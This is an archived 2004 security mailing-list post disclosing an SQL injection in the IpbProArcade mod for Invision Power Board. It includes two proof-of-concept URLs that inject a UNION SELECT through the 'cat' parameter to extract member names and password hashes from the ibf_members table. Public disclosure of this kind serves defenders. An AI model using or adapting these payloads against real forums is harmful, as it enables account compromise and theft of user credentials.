|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
IpbProArace 2.5.x SQL injection.
From: axl daivy (axlownz
gmail.com)
Date: Sat Nov 20 2004 - 14:05:53 CST
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
i have found an sql injection in the popular ipbproarcade mod for ipb systems (1.x and 2.x)
the vuln exists in the "category" field.
buy using this field it is possible to inject any sql query and compemise the entire forum system
p.o.c
for ipb 1.x
http://site.com/index.php?act=Arcade&cat=-1%20UNION%20SELECT%200,0,password,id,name,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20ibf_members/*
for ipb 2.x
index.php?act=Arcade&cat=-1%20UNION%20SELECT%200,0,legacy_password,id,name,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20ibf_members/*
discovered by Axl
credit goes to HLL for Helping me write the actual exploit
greetz to CereBrums And JonJon
cheers
Axl
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]